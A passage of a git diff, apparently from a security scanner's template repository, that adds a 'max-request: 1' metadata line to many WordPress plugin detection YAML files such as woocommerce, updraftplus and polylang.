b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml 